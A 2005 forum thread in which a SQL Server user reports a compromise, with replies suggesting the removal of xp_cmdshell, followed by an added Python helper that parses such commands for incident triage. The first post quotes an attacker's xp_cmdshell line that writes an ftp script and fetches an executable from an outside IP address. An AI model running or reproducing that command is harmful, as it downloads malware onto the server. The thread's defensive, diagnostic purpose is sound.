April 29, 2005 at 3:34 am
Hi,
Since I installed a firewall on my machine, it regularly detects unexpected ftp sessions.
Thanks to a process explorer, I remarked that ftp is launched from a (hidden) cmd.exe, itself launched by sql.exe (for your info, the ftp command line is: "ftp -n -s:???.txt" where ???.txt is a text file in \system32\).
In SQL Enterprise Manager, I see one suspect process. Process details :
EXEC master..xp_cmdshell 'echo open 81.244.123.174 6220 >> ntp.txt &echo user ntpbxu ntpbxu >> ntp.txt &echo get SCardClnt.exe >> ntp.txt &echo quit >> ntp.txt &ftp -n -s:ntp.txt
'
What SQL subsystem is able to launch such a process? A stored procedure? A trigger? (FYI, SQLAgent is not running.) How can I prevent this from occurring? Do I have to reinstall SQL Server?
Thank you for your help,
François
Note - contents of the textfile in \system32\:
open 81.244.183.229 19470
user itqavjflw itqavjflw
get SCardClnt.exe
quit
April 30, 2005 at 9:06 am
Just about anything that can get to the xp_CmdShell, and that would be a lot of things... that's why a lot of DBAs disable it. I don't know how to disable it but I'm sure that someone on this forum does.
--Jeff Moden
Change is inevitable... Change for the better is not.
May 3, 2005 at 3:27 am
Looks like someone is trying to download a file to your server.
use master
exec sp_dropextendedproc 'xp_cmdshell'
should drop the command shell access from SQL Server. I'd very carefully check to see where incoming connections to SQL Server are originating from. If someone is executing the command you posted, there are a lot of other things that same person could be doing.
Julian Kuiters
juliankuiters.id.au
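Added example (not part of any post in this thread): a Python triage helper that takes process text like the xp_cmdshell call quoted in the first post, rebuilds the ftp script it echoes to disk, and extracts the server, port, login and fetched file for firewall and log review. The sample command is constructed, with a documentation address and placeholder names, and the function names are hypothetical.

```python
import re

# One "echo <text> >> <file>" segment of a cmd.exe command chain.
ECHO_RE = re.compile(r"^\s*echo\s+(.*?)\s*>>\s*(\S+)\s*$", re.IGNORECASE)
# "ftp -n -s:<file>" runs the FTP client unattended from a script file.
FTP_RE = re.compile(r"\bftp\b.*?-s:(\S+)", re.IGNORECASE)

def parse_ftp_script(lines):
    """Pull host, port, user and fetched files out of ftp script lines."""
    info = {"host": None, "port": None, "user": None, "files": []}
    for line in lines:
        parts = line.split()
        verb = parts[0].lower() if parts else ""
        if verb == "open" and len(parts) > 1:
            info["host"] = parts[1]
            # The port is optional in "open"; the FTP default is 21.
            has_port = len(parts) > 2 and parts[2].isdigit()
            info["port"] = int(parts[2]) if has_port else 21
        elif verb == "user" and len(parts) > 1:
            info["user"] = parts[1]
        elif verb in ("get", "recv", "mget") and len(parts) > 1:
            info["files"].append(parts[1])
    return info

def analyze_cmdshell(sql_text):
    """Return a finding if sql_text is an xp_cmdshell call that echoes an
    ftp script to a file and then runs ftp against that file, else None."""
    m = re.search(r"xp_cmdshell\s+N?'(.*)", sql_text, re.IGNORECASE | re.DOTALL)
    if not m:
        return None
    command = m.group(1).rstrip().rstrip("'")
    written, ran = {}, None  # script name -> echoed lines; script run by ftp
    for segment in command.split("&"):
        echo = ECHO_RE.match(segment)
        ftp = FTP_RE.search(segment)
        if echo:
            written.setdefault(echo.group(2).lower(), []).append(echo.group(1))
        elif ftp:
            ran = ftp.group(1).lower()
    if ran is None or ran not in written:
        return None
    finding = parse_ftp_script(written[ran])
    finding["script"] = ran
    return finding

# Constructed sample: 192.0.2.10 is a documentation address, names are fake.
SAMPLE = ("EXEC master..xp_cmdshell 'echo open 192.0.2.10 6220 >> x.txt "
          "&echo user demo demo >> x.txt &echo get payload.exe >> x.txt "
          "&echo quit >> x.txt &ftp -n -s:x.txt\n'")
if __name__ == "__main__":
    print(analyze_cmdshell(SAMPLE))
```

A call that returns None only means this specific echo-then-ftp chain was not found; other uses of xp_cmdshell still deserve review.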